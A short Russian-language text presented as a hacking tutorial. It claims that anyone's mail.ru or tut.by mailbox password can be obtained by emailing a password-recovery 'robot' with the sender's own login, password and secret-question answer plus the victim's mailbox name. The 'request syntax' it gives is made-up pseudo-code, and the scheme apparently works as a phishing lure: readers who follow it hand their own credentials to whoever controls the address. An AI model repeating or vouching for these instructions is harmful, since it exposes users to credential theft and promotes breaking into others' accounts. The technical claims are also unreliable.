Взломать, т.е. получить пароль любого ящика на mail.ru и tut.by оказывается проще простого.
Дело в том, что mail.ru видимо писал какой-то корявый программер и оставил одну существенную
ошибку в своей “работе”, докопаться до которой было довольно таки сложно, но… всё приходит -
нужно только время. Tut.by поддаётся нижеописанному способу кражи пароля с ящиков по той
причине, что там сидят ещё более кривые программеры и вместо того, чтобы самим написать
свою технологию работы почты они её просто приобрели у mail.ru.
Теперь суть ошибки:
На mail.ru (и на tut.by тоже) есть система восстановления пароля: именно при её разработке
разработчики допустили серьезную ошибку:
Когда заполняешь форму на странице восстановления пароля и нажимаешь “Отправить”,
отправляется письмо к “mail-роботу”, который при правильном сочетании “Вопрос - Ответ”
отправляет пользователю пароль. Как выяснилось - этот “робот” изначально писался для
многофункциональной работы: например можно ему выслать пароль и имя ящика - и тогда
он выдаст ответ на “секретный вопрос”, или отослать ответ на “секретный вопрос” и логин -
тогда вам будет прислан пароль и т.д. Но это ещё полбеды. Оказывается если прислать “роботу”
имя ящика (логин), пароль на него и ответ на “секретный вопрос”, а как неизвестное вписать
какое-либо имя ящика (логин), находящегося на этом сервере, то робот пришлёт нам пароль
на этот ящик!
Теперь что и куда надо слать:
Mail-программа, принимающая запросы пользователей о забытых паролях установлена на
[email protected] (у tut.by это -
[email protected]). В теле письма начиная с 1-ой строчки
нужно писать:
< ? q_reppair=
$default-box: "имя_вашего_ящика_полностью";
$default-pass: "пароль_вашего_ящика";
$default-answ: "ответ_на_секретный_вопрос";
?a_reppair=
$unknown-box: "имя_ящика_пароль_которого_хотите_узнать";
$unknown-pass: "#take{array["bd_massive $pass_?"]
#unknown-pass}";
$CI: mail-box: "сюда_ещё_раз_имя_ящика_жертвы";
?>